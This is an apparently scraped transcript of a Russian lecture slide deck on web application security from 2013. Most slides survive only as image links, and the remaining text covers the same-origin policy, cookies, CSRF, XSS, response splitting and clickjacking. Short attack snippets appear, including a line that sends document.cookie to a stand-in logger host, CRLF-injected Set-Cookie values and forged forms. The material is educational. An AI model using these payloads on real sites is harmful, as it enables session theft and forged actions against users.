Безопасность интернет-приложений осень 2013 лекция 4
TRANSCRIPT
![Page 1: Безопасность интернет-приложений осень 2013 лекция 4](https://reader035.vdocuments.site/reader035/viewer/2022081514/557eef8ed8b42a34628b4f22/html5/thumbnails/1.jpg)
![Page 2: Безопасность интернет-приложений осень 2013 лекция 4](https://reader035.vdocuments.site/reader035/viewer/2022081514/557eef8ed8b42a34628b4f22/html5/thumbnails/2.jpg)
2
![Page 3: Безопасность интернет-приложений осень 2013 лекция 4](https://reader035.vdocuments.site/reader035/viewer/2022081514/557eef8ed8b42a34628b4f22/html5/thumbnails/3.jpg)
3
- Браузер- Место положения- Открытые сессии- Пользователь
![Page 4: Безопасность интернет-приложений осень 2013 лекция 4](https://reader035.vdocuments.site/reader035/viewer/2022081514/557eef8ed8b42a34628b4f22/html5/thumbnails/4.jpg)
4
PROTOCOL://DOMAIN:port
Одинаковый источник:http://example.com/http://example.com/folder/
Разный источник:http://example.com/https://example.com/http://test.example.com/http://example.com:8080/http://othersample.com/
![Page 5: Безопасность интернет-приложений осень 2013 лекция 4](https://reader035.vdocuments.site/reader035/viewer/2022081514/557eef8ed8b42a34628b4f22/html5/thumbnails/5.jpg)
5
http://kiwi.com/test_restrict.html
![Page 6: Безопасность интернет-приложений осень 2013 лекция 4](https://reader035.vdocuments.site/reader035/viewer/2022081514/557eef8ed8b42a34628b4f22/html5/thumbnails/6.jpg)
6
http://kiwi.com/test_restrict.html
![Page 7: Безопасность интернет-приложений осень 2013 лекция 4](https://reader035.vdocuments.site/reader035/viewer/2022081514/557eef8ed8b42a34628b4f22/html5/thumbnails/7.jpg)
7
http://kiwi.com/test_restrict.html
![Page 8: Безопасность интернет-приложений осень 2013 лекция 4](https://reader035.vdocuments.site/reader035/viewer/2022081514/557eef8ed8b42a34628b4f22/html5/thumbnails/8.jpg)
8
http://kiwi.com/test_restrict.html
![Page 9: Безопасность интернет-приложений осень 2013 лекция 4](https://reader035.vdocuments.site/reader035/viewer/2022081514/557eef8ed8b42a34628b4f22/html5/thumbnails/9.jpg)
9
http://kiwi.com/test_restrict.html
http://kiwi.com/src_restrict.html
![Page 10: Безопасность интернет-приложений осень 2013 лекция 4](https://reader035.vdocuments.site/reader035/viewer/2022081514/557eef8ed8b42a34628b4f22/html5/thumbnails/10.jpg)
10
http://www.kiwi.com/test_restrict.html
![Page 11: Безопасность интернет-приложений осень 2013 лекция 4](https://reader035.vdocuments.site/reader035/viewer/2022081514/557eef8ed8b42a34628b4f22/html5/thumbnails/11.jpg)
11
XMLHttpRequest
- Метод запроса- Заголовок запроса- Чтение заголовков- Чтение ответа
![Page 12: Безопасность интернет-приложений осень 2013 лекция 4](https://reader035.vdocuments.site/reader035/viewer/2022081514/557eef8ed8b42a34628b4f22/html5/thumbnails/12.jpg)
12
..domain=.target.com – любой поддомен target.com
ограничения:- время жизни (expires,max-age) - локация (path, domain)- дополнительные аттрибуты (httponly, secure)
![Page 13: Безопасность интернет-приложений осень 2013 лекция 4](https://reader035.vdocuments.site/reader035/viewer/2022081514/557eef8ed8b42a34628b4f22/html5/thumbnails/13.jpg)
13
![Page 14: Безопасность интернет-приложений осень 2013 лекция 4](https://reader035.vdocuments.site/reader035/viewer/2022081514/557eef8ed8b42a34628b4f22/html5/thumbnails/14.jpg)
14
link
code req1 req2
![Page 15: Безопасность интернет-приложений осень 2013 лекция 4](https://reader035.vdocuments.site/reader035/viewer/2022081514/557eef8ed8b42a34628b4f22/html5/thumbnails/15.jpg)
15
…<img src=‘http://target.com/killme?id=1’>…
…<form action=‘http://target.com/killme’><input type=hidden name=id value=1></form>… <script>submitForm()</script>
![Page 16: Безопасность интернет-приложений осень 2013 лекция 4](https://reader035.vdocuments.site/reader035/viewer/2022081514/557eef8ed8b42a34628b4f22/html5/thumbnails/16.jpg)
16
link link
Injected responce
![Page 17: Безопасность интернет-приложений осень 2013 лекция 4](https://reader035.vdocuments.site/reader035/viewer/2022081514/557eef8ed8b42a34628b4f22/html5/thumbnails/17.jpg)
17
![Page 18: Безопасность интернет-приложений осень 2013 лекция 4](https://reader035.vdocuments.site/reader035/viewer/2022081514/557eef8ed8b42a34628b4f22/html5/thumbnails/18.jpg)
18
![Page 19: Безопасность интернет-приложений осень 2013 лекция 4](https://reader035.vdocuments.site/reader035/viewer/2022081514/557eef8ed8b42a34628b4f22/html5/thumbnails/19.jpg)
19
![Page 20: Безопасность интернет-приложений осень 2013 лекция 4](https://reader035.vdocuments.site/reader035/viewer/2022081514/557eef8ed8b42a34628b4f22/html5/thumbnails/20.jpg)
20
![Page 21: Безопасность интернет-приложений осень 2013 лекция 4](https://reader035.vdocuments.site/reader035/viewer/2022081514/557eef8ed8b42a34628b4f22/html5/thumbnails/21.jpg)
21
![Page 22: Безопасность интернет-приложений осень 2013 лекция 4](https://reader035.vdocuments.site/reader035/viewer/2022081514/557eef8ed8b42a34628b4f22/html5/thumbnails/22.jpg)
22
document.write()document.writeln()eval().innerHTMLetc
flash:getURL(_root.param,”_blank”)
![Page 23: Безопасность интернет-приложений осень 2013 лекция 4](https://reader035.vdocuments.site/reader035/viewer/2022081514/557eef8ed8b42a34628b4f22/html5/thumbnails/23.jpg)
23
…new Image().src="http://logger.com/?c="+encodeURI(document.cookie);…
![Page 24: Безопасность интернет-приложений осень 2013 лекция 4](https://reader035.vdocuments.site/reader035/viewer/2022081514/557eef8ed8b42a34628b4f22/html5/thumbnails/24.jpg)
24
![Page 25: Безопасность интернет-приложений осень 2013 лекция 4](https://reader035.vdocuments.site/reader035/viewer/2022081514/557eef8ed8b42a34628b4f22/html5/thumbnails/25.jpg)
25
![Page 26: Безопасность интернет-приложений осень 2013 лекция 4](https://reader035.vdocuments.site/reader035/viewer/2022081514/557eef8ed8b42a34628b4f22/html5/thumbnails/26.jpg)
26
![Page 27: Безопасность интернет-приложений осень 2013 лекция 4](https://reader035.vdocuments.site/reader035/viewer/2022081514/557eef8ed8b42a34628b4f22/html5/thumbnails/27.jpg)
27
![Page 28: Безопасность интернет-приложений осень 2013 лекция 4](https://reader035.vdocuments.site/reader035/viewer/2022081514/557eef8ed8b42a34628b4f22/html5/thumbnails/28.jpg)
28
![Page 29: Безопасность интернет-приложений осень 2013 лекция 4](https://reader035.vdocuments.site/reader035/viewer/2022081514/557eef8ed8b42a34628b4f22/html5/thumbnails/29.jpg)
29
…Location: <user input> …
http://target.com?jump=<user input>
http://target.com?jump=hell%0d%0aSet-Cookie: gotohell%3d1
…Location: hellSet-Cookie: gotohell=1 …
![Page 30: Безопасность интернет-приложений осень 2013 лекция 4](https://reader035.vdocuments.site/reader035/viewer/2022081514/557eef8ed8b42a34628b4f22/html5/thumbnails/30.jpg)
30
![Page 31: Безопасность интернет-приложений осень 2013 лекция 4](https://reader035.vdocuments.site/reader035/viewer/2022081514/557eef8ed8b42a34628b4f22/html5/thumbnails/31.jpg)
31
Split (target.com/somevuln/)
target.com
target (target.com/admin/)
![Page 32: Безопасность интернет-приложений осень 2013 лекция 4](https://reader035.vdocuments.site/reader035/viewer/2022081514/557eef8ed8b42a34628b4f22/html5/thumbnails/32.jpg)
32
Split (target.com/somevuln/)
target.com
target (target.com/admin/)
![Page 33: Безопасность интернет-приложений осень 2013 лекция 4](https://reader035.vdocuments.site/reader035/viewer/2022081514/557eef8ed8b42a34628b4f22/html5/thumbnails/33.jpg)
33
target.com
![Page 34: Безопасность интернет-приложений осень 2013 лекция 4](https://reader035.vdocuments.site/reader035/viewer/2022081514/557eef8ed8b42a34628b4f22/html5/thumbnails/34.jpg)
34
target.com
Fake target (target.com/admin/)
…<form action=“evilsite.com”>…
![Page 35: Безопасность интернет-приложений осень 2013 лекция 4](https://reader035.vdocuments.site/reader035/viewer/2022081514/557eef8ed8b42a34628b4f22/html5/thumbnails/35.jpg)
35
Upgrade
Upgrade
![Page 36: Безопасность интернет-приложений осень 2013 лекция 4](https://reader035.vdocuments.site/reader035/viewer/2022081514/557eef8ed8b42a34628b4f22/html5/thumbnails/36.jpg)
36
![Page 37: Безопасность интернет-приложений осень 2013 лекция 4](https://reader035.vdocuments.site/reader035/viewer/2022081514/557eef8ed8b42a34628b4f22/html5/thumbnails/37.jpg)
37
...style='position:absolute;
left:0px;
top:0px;
z-index:10000;'...
![Page 38: Безопасность интернет-приложений осень 2013 лекция 4](https://reader035.vdocuments.site/reader035/viewer/2022081514/557eef8ed8b42a34628b4f22/html5/thumbnails/38.jpg)
38